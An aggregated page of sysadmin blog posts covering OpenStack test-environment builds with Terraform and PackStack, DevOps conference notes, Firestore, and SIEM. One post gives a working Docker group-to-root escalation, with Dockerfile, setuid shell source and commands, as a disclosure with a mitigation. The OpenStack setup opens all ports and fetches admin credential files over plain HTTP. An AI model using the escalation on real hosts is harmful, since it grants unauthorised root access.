Now, with all of that in place, re-run Packer:

$ pwd
/home/jtopjian/terraform-openstack-test/packer/openstack
$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Using the Image

When the build is complete, you will have a new image called packstack-ocata that you can create a virtual machine with.

As an example, you can use Terraform to launch the image:

variable "key_name" {}
variable "network_id" {}

variable "pool" {
  default = "public"
}

variable "flavor" {
  default = "m1.xlarge"
}

data "openstack_images_image_v2" "packstack" {
  name        = "packstack-ocata"
  most_recent = true
}

resource "random_id" "security_group_name" {
  prefix      = "openstack_test_instance_allow_all_"
  byte_length = 8
}

resource "openstack_networking_floatingip_v2" "openstack_acc_tests" {
  pool = "${var.pool}"
}

resource "openstack_networking_secgroup_v2" "openstack_acc_tests" {
  name        = "${random_id.security_group_name.hex}"
  description = "Rules for openstack acceptance tests"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_1" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_2" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "tcp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_3" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_4" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "udp"
  port_range_min    = 1
  port_range_max    = 65535
  remote_ip_prefix  = "::/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_5" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv4"
  protocol          = "icmp"
  remote_ip_prefix  = "0.0.0.0/0"
}

resource "openstack_networking_secgroup_rule_v2" "openstack_acc_tests_rule_6" {
  security_group_id = "${openstack_networking_secgroup_v2.openstack_acc_tests.id}"
  direction         = "ingress"
  ethertype         = "IPv6"
  protocol          = "icmp"
  remote_ip_prefix  = "::/0"
}

resource "openstack_compute_instance_v2" "openstack_acc_tests" {
  name            = "openstack_acc_tests"
  image_id        = "${data.openstack_images_image_v2.packstack.id}"
  flavor_name     = "${var.flavor}"
  key_pair        = "${var.key_name}"
  security_groups = ["${openstack_networking_secgroup_v2.openstack_acc_tests.name}"]

  network {
    uuid = "${var.network_id}"
  }
}

resource "openstack_compute_floatingip_associate_v2" "openstack_acc_tests" {
  instance_id = "${openstack_compute_instance_v2.openstack_acc_tests.id}"
  floating_ip = "${openstack_networking_floatingip_v2.openstack_acc_tests.address}"
}

resource "null_resource" "rc_files" {
  provisioner "local-exec" {
    command = <<EOF
      while true ; do
        wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_demo 2> /dev/null
        if [ $? = 0 ]; then
          break
        fi
        sleep 20
      done

      wget http://${openstack_compute_floatingip_associate_v2.openstack_acc_tests.floating_ip}/keystonerc_admin
    EOF
  }
}

The above Terraform configuration will do the following:

  1. Search for the latest image titled "openstack-ocata".
  2. Create a floating IP.
  3. Create a security group with a unique name and six rules to allow all TCP, UDP, and ICMP traffic.
  4. Launch an instance using the "openstack-ocata" image.
  5. Associate the floating IP to the instance.
  6. Poll the instance every 20 seconds to see if http://publicip/keystonerc_demo is available. When it is available, download it, along with keystonerc_admin.

To run this Terraform configuration, do:

$ terraform apply \
    -var "key_name=<keypair name>" \
    -var "network_id=<network uuid>" \
    -var "pool=<pool name>" \
    -var "flavor=<flavor name>"

Conclusion

This blog post detailed how to create a reusable image with OpenStack Ocata already installed. This allows you to create a standard testing environment in a fraction of the time that it takes to build the environment from scratch.

October 07, 2017 06:00 AM

October 05, 2017

The Lone Sysadmin

Stop Chrome Autoplay

If you didn’t catch this on Twitter: If you use Google Chrome, go to chrome://flags/#autoplay-policy and set it to “Document user activation is required.” Boom: no more auto-playing videos. You’re welcome. — Chris Meadows (@robotech_master) October 3, 2017 In short, go to chrome://flags/#autoplay-policy and set it to “Document user activation required.” It’s funny how simple things […]

The post Stop Chrome Autoplay appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 05, 2017 04:35 PM

October 04, 2017

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 3

Sanjeev Sharma – When DevOps met SRE: From Apollo 13 to Google SRE

  • Author of Two DevOps Bookks
  • Apollo 13
    • Who were the real heroes? The guys back at missing control. The Astronaunts just had to keep breathing and not die
  • Best Practice for Incident management
    • Prioritize
    • Prepare
    • Trust
    • Introspec
    • Consider Alternatives
    • Practice
    • Change it around
  • Big Hurdles to adoption of DevOps in Enterprise
    • Literature is Only looking at one delivery platform at a time
    • Big enterprise have hundreds of platforms with completely different technologies, maturity levels, speeds. All interdependent
    • He Divides
      • Industrialised Core – Value High, Risk Low, MTBF
      • Agile/Innovation Edge – Value Low, Risk High, Rapid change and delivery, MTTR
      • Need normal distribution curve of platforms across this range
      • Need to be able to maintain products at both ends in one IT organisation
  • 6 capabilities needed in IT Organisation
    • Planning and architecture.
      • Your Delivery pipeline will be as fast as the slowest delivery pipeline it is dependent on
    • APIs
      • Modernizing to Microservices based architecture: Refactoring code and data and defining the APIs
    • Application Deployment Automation and Environment Orchestration
      • Devs are paid code, not maintain deployment and config scripts
      • Ops must provide env that requires devs to do zero setup scripts
    • Test Service and Environment Virtualisation
      • If you are doing 2week sprints, but it takes 3-weeks to get a test server, how long are your sprints
    • Release Management
      • No good if 99% of software works but last 1% is vital for the business function
    • Operational Readiness for SRE
      • Shift between MTBF to MTTR
      • MTTR  = Mean time to detect + Mean time to Triage + Mean time to restore
      • + Mean time to pass blame
    • Antifragile Systems
      • Things that neither are fragile or robust, but rather thrive on chaos
      • Cattle not pets
      • Servers may go red, but services are always green
    • DevOps: “Everybody is responsible for delivery to production”
    • SRE: “(Everybody) is responsible for delivering Continuous Business Value”

Share

by simon at October 04, 2017 03:04 AM

October 03, 2017

Simon Lyall

DevOps Days Auckland 2017 – Wednesday Session 2

Marcus Bristol (Pushpay) – Moving fast without crashing

  • Low tolerance for errors in production due to being in finance
  • Deploy twice per day
  • Just Culture – Balance safety and accountability
    • What rule?
    • Who did it?
    • How bad was the breach?
    • Who gets to decide?
  • Example of Retributive Culture
    • KPIs reflect incidents.
    • If more than 10% deploys bad then affect bonus
    • Reduced number of deploys
  • Restorative Culture
  • Blameless post-mortem
    • Can give detailed account of what happened without fear or retribution
    • Happens after every incident or near-incident
    • Written Down in Wiki Page
    • So everybody has the chance to have a say
    • Summary, Timeline, impact assessment, discussion, Mitigations
    • Mitigations become highest-priority work items
  • Our Process
    • Feature Flags
    • Science
    • Lots of small PRs
    • Code Review
    • Testers paired to devs so bugs can be fixed as soon as found
    • Automated tested
    • Pollination (reviews of code between teams)
    • Bots
      • Posts to Slack when feature flag has been changed
      • Nags about feature flags that seems to be hanging around in QA
      • Nags about Flags that have been good in prod for 30+ days
      • Every merge
      • PRs awaiting reviews for long time (days)
      • Missing postmortun migrations
      • Status of builds in build farm
      • When deploy has been made
      • Health of API
      • Answer queries on team member list
      • Create ship train of PRs into a build and user can tell bot to deploy to each environment

Share

by simon at October 03, 2017 10:39 PM

DevOps Days Auckland 2017 – Wednesday Session 1

Michael Coté – Not actually a DevOps Talk

Digital Transformation

  • Goal: deliver value, weekly reliably, with small patches
  • Management must be the first to fail and transform
  • Standardize on a platform: special snow flakes are slow, expensive and error prone (see his slide, good list of stuff that should be standardize)
  • Ramping up: “Pilot low-risk apps, and ramp-up”
  • Pair programming/working
    • Half the advantage is people speed less time on reddit “research”
  • Don’t go to meetings
  • Automate compliance, have what you do automatic get logged and create compliance docs rather than building manually.
  • Crafting Your Cloud-Native Strategy

Sajeewa Dayaratne – DevOps in an Embedded World

  • Challenges on Embedded
    • Hardware – resource constrinaed
    • Debugging – OS bugs, Hardware Bugs, UFO Bugs – Oscilloscopes and JTAG connectors are your friend.
    • Environment – Thermal, Moisture, Power consumption
    • Deploy to product – Multi-month cycle, hard of impossible to send updates to ships at sea.
  • Principles of Devops , equally apply to embedded
    • High Frequency
    • Reduce overheads
    • Improve defect resolution
    • Automate
    • Reduce response times
  • Navico
    • Small Sonar, Navigation for medium boats, Displays for sail (eg Americas cup). Navigation displays for large ships
    • Dev around world, factory in Mexico
  • Codebase
    • 5 million lines of code
    • 61 Hardware Products supported – Increasing steadily, very long lifetimes for hardware
    • Complex network of products – lots of products on boat all connected, different versions of software and hardware on the same boat
  • Architecture
    • Old codebase
    • Backward compatible with old hardware
    • Needs to support new hardware
    • Desire new features on all products
  • What does this mean
    • Defects were found too late
    • Very high cost of bugs found late
    • Software stabilization taking longer
    • Manual test couldn’t keep up
    • Cost increasing , including opportunity cost
  • Does CI/CD provide answer?
    • But will it work here?
    • Case Study from HP. Large-Scale Agile Development by Gary Gruver
  • Our Plan
    • Improve tolls and archetecture
    • Build Speeds
    • Automated testing
    • Code quality control
  • Previous VCS
    • Proprietary tool with limit support and upgrades
    • Limited integration
    • Lack of CI support
    • No code review capacity
  • Move to git
    • Code reviews
    • Integrated CI
    • Supported by tools
  • Archetecture
    • Had a configurable codebase already
    • Fairly common hardware platform (only 9 variations)
    • Had runtime feature flags
    • But
      • Cyclic dependancies – 1.5 years to clean these up
      • Singletons – cut down
      • Promote unit testability – worked on
      • Many branches – long lived – mega merges
  • Went to a single Branch model, feature flags, smaller batch sizes, testing focused on single branch
  • Improve build speed
    • Start 8 hours to build Linux platform, 2 hours for each app, 14+ hours to build and package a release
    • Options
      • Increase speed
      • Parallel Builds
    • What did
      • ccache.clcache
      • IncrediBuild
      • distcc
    • 4-5hs down to 1h
  • Test automation
    • Existing was mock-ups of the hardware to not typical
    • Started with micro-test
      • Unit testing (simulator)
      • Unit testing (real hardware)
    • Build Tools
      • Software tools (n2k simulator, remote control)
      • Hardware tools ( Mimic real-world data, re purpose existing stuff)
    • UI Test Automation
      • Build or Buy
      • Functional testing vs API testing
      • HW Test tools
      • Took 6 hours to do full test on hardware.
  • PipeLine
    • Commit -> pull request
    • Automated Build / Unit Tests
    • Daily QA Build
  • Next?
    • Configuration as code
    • Code Quality tools
    • Simulate more hardware
    • Increase analytics and reporting
    • Fully simulated test env for dev (so the devs don’t need the hardware)
    • Scale – From internal infrastructure to the cloud
    • Grow the team
  • Lessons Learnt
    • Culture!
    • Collect Data
    • Get Executive Buy in
    • Change your tolls and processes if needed
    • Test automation is the key
      • Invest in HW
      • Silulate
      • Virtualise
    • Focus on good software design for Everything

Share

by simon at October 03, 2017 09:29 PM

Sarah Allen

ultimate serverless combo: Firestore + Functions

Serverless development just got easier — today’s release of Cloud Firestore with event triggers for Cloud Functions combine to offer significant developer velocity from idea to production to scale.

I’ve worked on dozens of mobile and web apps and have always been dismayed by the amount of boilerplate code needed to shuffle data between client and server and implement small amounts of logic on the server-side. Serverless APIs + serverless compute reduce the amount of code needed to write an app, increasing velocity throughout the development cycle. Less code means fewer bugs.

Cloud Firestore + Cloud Functions with direct-from-mobile access enabled by Firebase Auth and Firebase Rules combine to deliver something very new in this space. Unhosted Web apps are also enabled by Web SDKs.

It is not a coincidence that I’ve worked on all of these technologies since joining Google last year. My first coding project at Google was developing the initial version of the Firestore UI in the Firebase Console. I then stepped into an engineering management role, leading the engineering teams that work on server-side code where Firebase enables access to Google Cloud.

Cloud Firestore

  • Realtime sync across Web and mobile clients: This is not just about realtime apps. Building user interfaces is substantially easier: using reactive patterns and progressively filling in details allows apps to be ready for user interaction faster.
  • Scales with the size of the result set: Simple apps are simple. For complex apps, you still need to be thoughtful about modeling your data, and the reward is that anything that works for you and your co-workers will scale to everyone on the planet using your app. From my perspective, this is the most significant and exciting property of the Cloud Firestore.
  • iOS, Android and Web SDKs

Cloud Functions

  • Events for create, write, update, and delete (learn how)
  • Write and deploy JavaScript functions that do exactly and only what you need
  • You can also use TypeScript (JS SDKs include typings)

All the Firebase things

  • Free tier and when you exceed that, you only pay for what you use.
  • Zero to planet scale: no sharding your database, no calculating how many servers you need, focus on how your app works.
  • Secure data access with Firebase Rules: simple, yet powerful declarative syntax to specify what data can be accessed by client code. For example, some data may be read-only access for social sharing or public parts of an app, user data might be only written by that user, and some other data may be only written by server-code.
  • Firebase Auth: all the social logins, email/password, phone or you can write code for custom auth
  • Lots more Firebase things

All this combines to allow developers to focus on building an app, writing new code that offers unique value. It’s been a while since I’ve been actually excited about new technology that has immediate and practical use cases. I’m so excited to be able to use this tech in the open for my side projects, and can’t wait to see the serious new apps…..

by sarah at October 03, 2017 05:07 PM

October 02, 2017

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – September 2017

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts/topics this
month:
  1. Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge.  Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” … 
  2. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here.
  3. Simple Log Review Checklist Released!” is often at the top of this list – this aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
  4. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials. 
  5. “SIEM Bloggables”  is a very old post , more like a mini-paper on  some key aspects of SIEM, use cases, scenarios, etc as well as 2 types of SIEM users.
In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X of the traffic of this blog]: 

Current research on SIEM:
Planned research on SOAR (security orchestration,  automation and response):
Planned research on MSSP:

Miscellaneous fun posts:

(see all my published Gartner research here)
Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

Previous post in this endless series:

by Anton Chuvakin (anton@chuvakin.org) at October 02, 2017 03:13 PM

September 30, 2017

Electricmonk.nl

Root your Docker host in 10 seconds for fun and profit

Disclaimer: There is no actual profit. That was just one of those clickbaity things everybody seems to like so much these days. Also, it's not really fun. Alright, on with the show!

A common practice is to add users that need to run Docker containers on your host to the docker group. For example, an automated build process may need a user on the target system to stop and recreate containers for testing or deployments. What is not obvious right away is that this is basically the same as giving those users root access. You see, the Docker daemon runs as root and when you add users to the docker group, they get full access over the Docker daemon.

So how hard is it to exploit this and become root on the host if you are a member of the docker group? Not very hard at all…

$ id
uid=1000(fboender) gid=1000(fboender) groups=1000(fboender), 999(docker)
$ cd docker2root
$ docker build --rm -t docker2root .
$ docker run -v /tmp/persist:/persist docker2root:latest /bin/sh root.sh
$ /tmp/persist/rootshell
# id
uid=0(root) gid=1000(fboender) groups=1000(fboender),999(docker)
# ls -la /root
total 64
drwx------ 10 root root 4096 aug  1 10:32 .
drwxr-xr-x 25 root root 4096 sep 19 05:51 ..
-rw-------  1 root root  366 aug  3 09:26 .bash_history

So yeah, that took all of 3 seconds. I know I said 10 in the title, but the number 10 has special SEO properties. Remember, this is on the Docker host, not in a container or anything!

How does it work?

When you mount a volume into a container, that volume is mounted as root. By default, processes in a container also run as root. So all you have to do is write a setuid root owned binary to the volume, which will then appear as a setuid root binary on the host in that volume too.

Here's what the Dockerfile looks like:

FROM alpine:3.5
COPY root.sh root.sh
COPY rootshell rootshell

The rootshell file is a binary compiled from the following source code (rootshell.c):

int main()
{
   setuid( 0 );
   system( "/bin/sh" );
   return 0;
}

This isn't strictly needed, but most shells and many other programs refuse to run as a setuid binary.

The root.sh file simply copies the rootshell binary to the volume and sets the setuid bit on it:

#!/bin/sh

cp rootshell /persist/rootshell
chmod 4777 /persist/rootshell

That's it.

Why I don't need to report this

I don't need to report this, because it is a well-known vulnerability. In fact, it's one of the less worrisome ones. There's plenty more including all kinds of privilege escalation vulnerabilities from inside container, etc. As far as I know, it hasn't been fixed in the latest Docker, nor will it be fixed in future versions. This is in line with the modern stance on security in the tech world: "security? What's that?" Docker goes so far as to call them "non-events". Newspeak if I ever heard it.

Some choice bullshit quotes from the Docker frontpage and documentation:

Secure by default: Easily build safer apps, ensure tamper-proof transit of all app components and run apps securely on the industry’s most secure container platform.

LOL, sure.

We want to ensure that Docker Enterprise Edition can be used in a manner that meets the requirements of various security and compliance standards.

Either that same courtesy does not extend to the community edition, security by default is no longer a requirement, or it's a completely false claim.

They do make some casual remarks about not giving access to the docker daemon to untrusted users in the Security section of the documentation:

only trusted users should be allowed to control your Docker daemon

However, they fail to mention that giving a user control of your Docker daemon is basically the same as giving them root access. Given that many companies are doing auto-deployments, and have probably given docker daemon access to a deployment user, your build server is now effectivaly also root on all your build slaves, dev, uat and perhaps even production systems.

Luckily, since Docker’s approach to secure by default through apparmor, seccomp, and dropping capabilities

3 seconds to get root on my host with a default Docker install doesn't look like "secure by default" to me. None of these options were enabled by default when I CURL-installed (!!&(@#!) Docker on my system, nor was I warned that I'd need to secure things manually.

How to fix this

There's a workaround available. It's hidden deep in the documentation and took me while to find. Eventually some StackExchange discussion pointed me to a concept known as UID remapping (subuids). This uses the Linux namespaces capabilities to map the user IDs of users in a container to a different range on the host. For example, if you're uid 1000, and you remap the UID to 20000, then the root user (uid 0) in the container becomes uid 20000, uid 1 becomes uid 20001, etc.

You can read about how to manually (because docker is secure by default, remember) configure that on the Isolate containers with a user namespace documentation page. 

by admin at September 30, 2017 12:39 PM

Joe Topjian

Building OpenStack Environments

Introduction

I work a number of OpenStack-based projects. In order to make sure they work correctly, I need to test them against an OpenStack environment. It's usually not a good idea to test on a production environment since mistakes and bugs can cause damage to production.

So the next best option is to create an OpenStack environment strictly for testing purposes. This blog post will describe how to create such an environment.

Where to Run OpenStack

The first topic of consideration is where to run OpenStack.

VirtualBox

At a minimum, you can install VirtualBox on your workstation and create a virtual machine. This is quick, easy, and free. However, you're limited to the resources of your workstation. For example, if your laptop only has 4GB of memory and two cores, OpenStack is going to run slow.

AWS

Another option is to use AWS. While AWS offers a free tier, it's restricted (I think) to the t2.micro flavor. This flavor only supports 1 vCPU, which is is usually worse than your laptop. Larger instances will cost anywhere from $0.25 to $5.00 (and up!) per hour to run. It can get expensive.

However, AWS offers "spot-instances". These are virtual machines that cost a fraction of normal virtual machines. This is possible because spot instances run on spare, unused capacity in Amazon's cloud. The catch is that your virtual machine could be deleted when a higher paying customer wants to use the space. You certainly don't want to do this for production (well, you can, and that's a fun exercise on its own), but for testing, it's perfect.

With Spot Instances, you can run an m3.xlarge flavor, which consists of 4 vCPUs and 16GB of memory, for $0.05 per hour. An afternoon of work will cost you $0.20. Well worth the cost of 4 vCPUs and 16GB of memory, in my opinion.

Spot Pricing is constantly changing. Make sure you check the current price before you begin working. And make sure you do not leave your virtual machine running indefinitely!

Other Spot Pricing Clouds

Both Google and Azure offer spot instances, however, I have not had time to try them, so I can't comment.

Your Own Cloud

The best resource is your own cloud. Maybe you already have a home lab set up or your place of $work has a cloud you can use. This way, you can have a large amount of resources available to use for free.

Provisioning a Virtual Machine

Once you have your location sorted out, you need to decide how to interact with the cloud to provision a virtual machine.

At a minimum, you can use the standard GUI or console that the cloud provides. This works, but it's a hassle to have to manually go through all settings each time you want to launch a new virtual machine. It's always best to test with a clean environment, so you will be creating and destroying virtual machines a lot. Manually setting up virtual machines will get tedious and is prone to human error. Therefore, it's better to use a tool to automate the process.

Terraform

Terraform is a tool that enables you to declaratively create infrastructure. Think of it like Puppet or Chef, but for virtual machines and virtual networks instead of files and packages.

I highly recommend Terraform for this, though I admit I am biased because I spend a lot of time contributing to the Terraform project.

Deploying to AWS

As a reference example, I'll show how to use Terraform to deploy to AWS. Before you begin, make sure you have a valid AWS account and you have gone through the Terraform intro.

There's some irony about using AWS to deploy OpenStack. However, some readers might not have access to an OpenStack cloud to deploy to. Please don't turn this into a political discussion.

On your workstation, open a terminal and make a directory:

$ pwd
/home/jtopjian
$ mkdir terraform-openstack-test
$ cd terraform-openstack-test

Next, generate an SSH key pair:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir key
$ cd key
$ ssh-keygen -t rsa -N '' -f id_rsa
$ cd ..

Next, create a main.tf file which will house our configuration:

$ pwd
/home/jtopjian/terraform-openstack-test
$ vi main.tf

Start by creating a key pair:

provider "aws" {
  region = "us-west-2"
}

resource "aws_key_pair" "openstack" {
  key_name   = "openstack-key"
  public_key = "${file("key/id_rsa.pub")}"
}

With that in place, run:

$ terraform init
$ terraform apply

Next, create a Security Group. This will allow traffic in and out of the virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

+ resource "aws_security_group" "openstack" {
+   name        = "openstack"
+   description = "Allow all inbound/outbound traffic"
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "tcp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "udp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "icmp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+ }

Note: Don't include the +. It's used to highlight what has been added to the configuration.

With that in place, run:

$ terraform plan
$ terraform apply

If you log in to your AWS console through a browser, you can see that the key pair and security group have been added to your account.

You can easily destroy and recreate these resources at-will:

$ terraform plan
$ terraform destroy
$ terraform plan
$ terraform apply
$ terraform show

Finally, create a virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

+ resource "aws_spot_instance_request" "openstack" {
+   ami = "ami-0c2aba6c"
+   spot_price = "0.0440"
+   instance_type = "m3.xlarge"
+   wait_for_fulfillment = true
+   spot_type = "one-time"
+   key_name = "${aws_key_pair.openstack.key_name}"
+
+   security_groups = ["default", "${aws_security_group.openstack.name}"]
+
+   root_block_device {
+     volume_size = 40
+     delete_on_termination = true
+   }
+
+   tags {
+     Name = "OpenStack Test Infra"
+   }
+ }
+
+ output "ip" {
+   value = "${aws_spot_instance_request.openstack.public_ip}"
+ }

Above, an aws_sport_instance_request resource was added. This will launch a Spot Instance using the parameters we specified.

It's important to note that the aws_spot_instance_request resource also takes the same parameters as the aws_instance resource.

The ami being used is the latest CentOS 7 AMI published in the us-west-2 region. You can see the list of AMIs here. Make sure you use the correct AMI for the region you're deploying to.

Notice how this resource is referencing the other resources you created (the key pair, and the security group). Additionally, notice how you're specifying a spot_price. This is helpful to limit the amount of money that will be spent on this instance. You can get an accurate price by going to the Spot Request page and clicking on "Pricing History". Again, make sure you are looking at the correct region.

An output was also added to the main.tf file. This will print out the public IP address of the AWS instance when Terraform completes.

Amazon limits the amount of spot instances you can launch at any given time. You might find that if you create, delete, and recreate a spot instance too quickly, Terraform will give you an error. This is Amazon telling you to wait. You can open a support ticket with Amazon/AWS and ask for a larger spot quota to be placed on your account. I asked for the ability to launch 5 spot instances at any given time in the us-west-1 and us-west-2 region. This took around two business days to complete.

With all of this in place, run Terraform:

$ terraform apply

When it has completed, you should see output similar to the following:

Outputs:

ip = 54.71.64.171

You should now be able to SSH to the instance:

$ ssh -i key/id_rsa centos@54.71.64.171

And there you have it! You now have access to a CentOS virtual machine to continue testing OpenStack with.

Installing OpenStack

There are numerous ways to install OpenStack. Given that the purpose of this setup is to create an easy-to-deploy OpenStack environment for testing, let's narrow our choices down to methods that can provide a simple all-in-one setup.

DevStack

DevStack provides an easy way of creating an all-in-one environment for testing. It's mainly used to test the latest OpenStack source code. Because of that, it can buggy. I've found that even when using DevStack to deploy a stable version of OpenStack, there were times when DevStack failed to complete. Given that it takes approximately two hours for DevStack to install, having the installation fail has just wasted two hours of time.

Additionally, DevStack isn't suitable to run on a virtual machine which might reboot. When testing an application that uses OpenStack, it's possible that the application causes the virtual machine to be overloaded and lock up.

So for these reasons, I won't use DevStack here. That's not to say that DevStack isn't a suitable tool – after all, it's used as the core of all OpenStack testing.

PackStack

PackStack is also able to easily install an all-in-one OpenStack environment. Rather than building OpenStack from source, it leverages RDO packages and Puppet.

PackStack is also beneficial because it will install the latest stable release of OpenStack. If you are developing an application that end-users will use, these users will most likely be using an OpenStack cloud based on a stable release.

Installing OpenStack with PackStack

The PackStack home page has all necessary instructions to get a simple environment up and running. Here are all of the steps compressed into a shell script:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

OpenStack Pike is available at the time of this writing, however, I have not had a chance to test and verify the instructions work. Therefore, I'll be using Ocata.

Save the file as something like deploy.sh and then run it in your virtual machine:

$ sudo bash deploy.sh

Consider using a tool like tmux or screen after logging into your remote virtual machine. This will ensure the deploy.sh script continues to run, even if your connection to the virtual machine was terminated.

The process will take approximately 30 minutes to complete.

When it's finished, you'll now have a usable all-in-one environment:

$ sudo su
$ cd /root
$ source keystonerc_demo
$ openstack network list
$ openstack image list
$ openstack server create --flavor 1 --image cirros test

Testing with OpenStack

Now that OpenStack is up and running, you can begin testing with it.

Let's say you want to add a new feature to Gophercloud. First, you need to install Go:

$ yum install -y wget
$ wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
$ chmod +x /usr/local/bin/gimme
$ eval "$(/usr/local/bin/gimme 1.8)"
$ export GOPATH=$HOME/go
$ export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

To make those commands permanent, add the following to your .bashrc file:

if [[ -f /usr/local/bin/gimme ]]; then
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
fi

Next, install Gophercloud:

$ go get github.com/gophercloud/gophercloud
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go get -u ./...

In order to run Gophercloud acceptance tests, you need to have several environment variables set. These are described here.

It would be tedious to set each variable for each test or each time you log in to the virtual machine. Therefore, embed the variables into the /root/keystonerc_demo and /root/keystonerc_admin files:

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
